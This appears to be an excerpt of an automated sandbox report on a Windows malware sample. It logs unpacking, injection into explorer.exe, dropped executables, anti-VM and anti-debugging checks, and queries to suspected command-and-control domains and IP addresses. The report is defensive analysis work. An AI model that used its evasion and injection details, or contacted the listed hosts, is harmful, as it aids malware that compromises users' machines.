                  Source: Binary string: C:\dobixuyapuxez\cohimu_88 jekumuhe\67.pdb source: F4FD.exe, 00000006.00000000.449000017.0000000000401000.00000020.00000001.01000000.00000008.sdmp, udgatra, 00000015.00000002.602489552.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, udgatra, 00000015.00000000.543137145.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
                  Source: Binary string: C:\topefife94\vafivesobuvo12\nugotelosowos\jiwewoha.pdb source: file.exe
                  Source: Binary string: #+C:\dobixuyapuxez\cohimu_88 jekumuhe\67.pdb source: F4FD.exe, 00000006.00000000.449000017.0000000000401000.00000020.00000001.01000000.00000008.sdmp, udgatra, 00000015.00000002.602489552.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, udgatra, 00000015.00000000.543137145.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
                  Source: Binary string: .C:\topefife94\vafivesobuvo12\nugotelosowos\jiwewoha.pdb source: file.exe
                  Source: Binary string: ]C:\setupipayadewu\gala\muhoci-yileyowip71.pdb source: ECFD.exe, 00000005.00000000.443846038.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe, 00000009.00000000.486986085.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe.1.dr
                  Source: Binary string: C:\feyiguha\pelejitahuhufe14 gewofaj.pdb source: 543.exe, 0000000B.00000000.489003730.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
                  Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: ECFD.exe, 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: C:\setupipayadewu\gala\muhoci-yileyowip71.pdb source: ECFD.exe, 00000005.00000000.443846038.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe, 00000009.00000000.486986085.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe.1.dr
                  Source: Binary string: MC:\ziradevetu84\faduxusiyipa29\jigi.pdb( source: 3804.exe, 0000000A.00000000.485964331.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                  Source: Binary string: CC:\feyiguha\pelejitahuhufe14 gewofaj.pdb source: 543.exe, 0000000B.00000000.489003730.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
                  Source: Binary string: C:\ziradevetu84\faduxusiyipa29\jigi.pdb source: 3804.exe, 0000000A.00000000.485964331.0000000000401000.00000020.00000001.01000000.0000000B.sdmp

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Roaming\tfgatraUnpacked PE file: 4.2.tfgatra.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeUnpacked PE file: 6.2.F4FD.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409834 push eax; ret
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E99D push ecx; ret
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B243 push ecx; ret
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00601890 push cs; retf
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: 4_2_00401829 push cs; retf
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: 4_2_00409834 push eax; ret
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: 4_2_0040E99D push ecx; ret
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: 4_2_0040B243 push ecx; ret
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_00409834 push eax; ret
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_0040E99D push ecx; ret
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_0040B243 push ecx; ret
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_007D2937 push 0000002Ch; retf
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_007D1E17 push eax; ret
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_007D2785 pushad ; iretd
                  Source: EAA.exe.1.drStatic PE information: section name: _RDATA
                  Source: EAA.exe.1.drStatic PE information: section name: .vmp0
                  Source: EAA.exe.1.drStatic PE information: section name: .vmp1
                  Source: 2A57.exe.1.drStatic PE information: section name: _RDATA
                  Source: 2A57.exe.1.drStatic PE information: section name: .vmp0
                  Source: 2A57.exe.1.drStatic PE information: section name: .vmp1
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1

                  Persistence and Installation Behavior

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\udgatraJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tfgatraJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\udgatraJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\857.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2A57.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\ECFD.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\EB37.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\EAA.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F4FD.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tfgatraJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3804.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9763.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B03C.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\543.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A28F.exeJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\tfgatra:Zone.Identifier read attributes | delete
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\udgatra:Zone.Identifier read attributes | delete
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: F4FD.exe, 00000006.00000002.523107816.00000000007D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                  Source: C:\Users\user\AppData\Local\Temp\2A57.exeRDTSC instruction interceptor: First address: 00000001405E24DC second address: 00000001405E255F instructions: 0x00000000 rdtsc 0x00000002 setle dh 0x00000005 not dl 0x00000007 inc ecx 0x00000008 push edx 0x00000009 pushfd 0x0000000a dec eax 0x0000000b mov edx, 00000000h 0x00000010 add byte ptr [eax], al 0x00000012 add byte ptr [eax], al 0x00000014 inc cx 0x00000016 bswap ecx 0x00000018 dec ecx 0x00000019 not eax 0x0000001b push edx 0x0000001c cwde 0x0000001d dec esp 0x0000001e mov eax, dword ptr [esp+00000090h] 0x00000025 inc eax 0x00000026 xchg bl, dh 0x00000028 inc ax 0x0000002a movsx esi, ch 0x0000002d inc ecx 0x0000002e not eax 0x00000030 inc ecx 0x00000031 inc eax 0x00000033 cmc 0x00000034 cmovnp ax, ax 0x00000038 inc ecx 0x00000039 ror eax, 03h 0x0000003c inc ecx 0x0000003d cmp ah, ah 0x0000003f inc ecx 0x00000040 add eax, 7BE95E8Eh 0x00000046 bt bx, cx 0x0000004a inc eax 0x0000004b sub dh, FFFFFFA5h 0x0000004e inc eax 0x0000004f shl dh, cl 0x00000051 dec ebp 0x00000052 lea eax, dword ptr [eax+edx] 0x00000055 dec eax 0x00000056 mov esi, 00000000h 0x0000005b add dword ptr [eax], eax 0x0000005d add byte ptr [eax], al 0x0000005f dec ecx 0x00000060 sbb ebx, ebx 0x00000062 dec esp 0x00000063 add eax, esi 0x00000065 bt edx, 33h 0x00000069 dec esp 0x0000006a mov ecx, esp 0x0000006c dec eax 0x0000006d not eax 0x0000006f dec eax 0x00000070 sub esp, 00000180h 0x00000076 xchg eax, edx 0x00000077 bt ax, FFB2h 0x0000007c dec eax 0x0000007d and esp, FFFFFFF0h 0x00000083 rdtsc
                  Source: C:\Users\user\AppData\Local\Temp\EAA.exeRDTSC instruction interceptor: First address: 00000001405E24DC second address: 00000001405E255F instructions: 0x00000000 rdtsc 0x00000002 setle dh 0x00000005 not dl 0x00000007 inc ecx 0x00000008 push edx 0x00000009 pushfd 0x0000000a dec eax 0x0000000b mov edx, 00000000h 0x00000010 add byte ptr [eax], al 0x00000012 add byte ptr [eax], al 0x00000014 inc cx 0x00000016 bswap ecx 0x00000018 dec ecx 0x00000019 not eax 0x0000001b push edx 0x0000001c cwde 0x0000001d dec esp 0x0000001e mov eax, dword ptr [esp+00000090h] 0x00000025 inc eax 0x00000026 xchg bl, dh 0x00000028 inc ax 0x0000002a movsx esi, ch 0x0000002d inc ecx 0x0000002e not eax 0x00000030 inc ecx 0x00000031 inc eax 0x00000033 cmc 0x00000034 cmovnp ax, ax 0x00000038 inc ecx 0x00000039 ror eax, 03h 0x0000003c inc ecx 0x0000003d cmp ah, ah 0x0000003f inc ecx 0x00000040 add eax, 7BE95E8Eh 0x00000046 bt bx, cx 0x0000004a inc eax 0x0000004b sub dh, FFFFFFA5h 0x0000004e inc eax 0x0000004f shl dh, cl 0x00000051 dec ebp 0x00000052 lea eax, dword ptr [eax+edx] 0x00000055 dec eax 0x00000056 mov esi, 00000000h 0x0000005b add dword ptr [eax], eax 0x0000005d add byte ptr [eax], al 0x0000005f dec ecx 0x00000060 sbb ebx, ebx 0x00000062 dec esp 0x00000063 add eax, esi 0x00000065 bt edx, 33h 0x00000069 dec esp 0x0000006a mov ecx, esp 0x0000006c dec eax 0x0000006d not eax 0x0000006f dec eax 0x00000070 sub esp, 00000180h 0x00000076 xchg eax, edx 0x00000077 bt ax, FFB2h 0x0000007c dec eax 0x0000007d and esp, FFFFFFF0h 0x00000083 rdtsc
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Windows\explorer.exe TID: 2328Thread sleep count: 645 > 30
                  Source: C:\Windows\explorer.exe TID: 4460Thread sleep count: 250 > 30
                  Source: C:\Windows\explorer.exe TID: 2152Thread sleep count: 211 > 30
                  Source: C:\Windows\explorer.exe TID: 2824Thread sleep count: 486 > 30
                  Source: C:\Windows\explorer.exe TID: 4636Thread sleep count: 112 > 30
                  Source: C:\Windows\explorer.exe TID: 3492Thread sleep count: 88 > 30
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 645
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 486
                  Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\EB37.exeJump to dropped file
                  Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9763.exeJump to dropped file
                  Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B03C.exeJump to dropped file
                  Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\A28F.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                  Source: explorer.exe, 00000001.00000000.331472438.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                  Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.567344648.0000000000824000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW[;
                  Source: explorer.exe, 00000001.00000000.317714700.000000000091F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000001.00000000.368088384.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
                  Source: explorer.exe, 00000001.00000000.368088384.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: 2A57.exe, 00000008.00000003.557817185.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.617175126.00000000005D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW w
                  Source: ECFD.exe, 00000009.00000002.646270742.0000000000786000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8
                  Source: explorer.exe, 00000001.00000000.391524561.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                  Source: EAA.exe, 0000000C.00000003.555840925.0000000002475000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0%
                  Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.567344648.0000000000824000.00000004.00000020.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.619137126.0000000000724000.00000004.00000020.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: explorer.exe, 00000001.00000000.368088384.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                  Source: ECFD.exe, 00000009.00000002.646270742.0000000000786000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
                  Source: explorer.exe, 00000001.00000000.331472438.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                  Source: 2A57.exe, 00000008.00000003.525039609.00000000005D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformation
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeSystem information queried: CodeIntegrityInformation
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060092B mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00600D90 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_005F092B mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_005F0D90 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_007CC56A push dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeProcess queried: DebugPort

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\explorer.exeDomain query: kkh.eiwagggg.com
                  Source: C:\Windows\explorer.exeDomain query: keziheritier.com
                  Source: C:\Windows\explorer.exeDomain query: github.com
                  Source: C:\Windows\explorer.exeDomain query: furubujjul.net
                  Source: C:\Windows\explorer.exeDomain query: pelegisr.com
                  Source: C:\Windows\explorer.exeDomain query: www.rukangiralawchambers.org
                  Source: C:\Windows\explorer.exeDomain query: avtlsgosecure.com
                  Source: C:\Windows\explorer.exeNetwork Connect: 45.138.74.52 80
                  Source: C:\Windows\explorer.exeNetwork Connect: 179.43.163.115 80
                  Source: C:\Windows\explorer.exeFile created: A28F.exe.1.drJump to dropped file
                  Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                  Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                  Source: C:\Users\user\AppData\Local\Temp\ECFD.exeMemory written: C:\Users\user\AppData\Local\Temp\ECFD.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 2901ACC
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeThread created: unknown EIP: 5291A80
                  Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F9F380
                  Source: C:\Windows\explorer.exeMemory written: PID: 3624 base: F9F380 value: 90
                  Source: C:\Windows\explorer.exeMemory written: PID: 5300 base: 7FF69BD28150 value: 90
                  Source: C:\Users\user\AppData\Local\Temp\ECFD.exeProcess created: C:\Users\user\AppData\Local\Temp\ECFD.exe C:\Users\user\AppData\Local\Temp\ECFD.exe
                  Source: explorer.exe, 00000001.00000000.322842452.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.333336819.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.317880270.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000001.00000000.317880270.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.389174458.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.360247280.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
                  Source: explorer.exe, 00000001.00000000.317880270.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.389174458.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.360247280.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000001.00000000.317880270.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.389174458.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.360247280.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: explorer.exe, 00000001.00000000.359379247.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.388189782.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.317378275.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
                  Source: C:\Users\user\Desktop\file.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
                  Source: C:\Users\user\Desktop\file.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
                  Source: C:\Users\user\Desktop\file.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                  Source: C:\Users\user\Desktop\file.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
